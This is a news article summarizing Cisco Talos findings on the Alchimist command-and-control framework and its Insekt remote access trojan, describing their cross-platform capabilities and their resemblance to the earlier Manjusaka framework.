Cybersecurity researchers at Cisco Talos have discovered new malware including a command and control (C2) tool called ‘Alchimist’, which appears to be actively used in attacks targeting Windows, Linux, and macOS systems.
This malware and all its files are 64-bit executables written in GoLang, a programming language that makes cross-compatibility between different operating systems much easier, thus affecting the potential number of infected computers.
This is how ‘Alchimist’ infects you
Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy the payload to remote machines, capture screenshots, remotely execute shellcode and execute arbitrary commands, Cisco explains in your report of this vulnerability.
The framework supports the creation of custom infection mechanisms to deliver the ‘Insekt’ Remote Access Trojan (RAT) to devices and assists hackers by generating PowerShell (for Windows) and wget (for Linux) code snippets for deployment of the RAT.
The Insekt payload can be configured in the Alchimist interface using various parameters such as C2 IP/URL, platform (Windows or Linux), and communication protocol (TLS, SNI, WSS/WS). Insekt doesn’t work on macOS yet, so Alchimist fills this gap with a Mach-O file, a 64-bit executable written in GoLang that contains an exploit.
Manjusaka’s successor?
The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another malware known as Manjusaka, which itself was billed as the “Chinese brother of Sliver and Cobalt Strike.”
Both Manjusaka and Alchimist have similar functionality, despite differences in implementation when it comes to web interfaces. Alchimist is another attack framework available to cybercriminals who do not have the knowledge or ability to build all the necessary components for more sophisticated cyberattacks.
Unfortunately, these malware are out-of-the-box and high-quality, feature-rich, good at evading detection by antivirus and security solutions, and effective at implanting targets. That said, they are even beneficial to more advanced threat actors who want to minimize their operational expenses and combine with random malicious traffic from other hackers to evade attribution.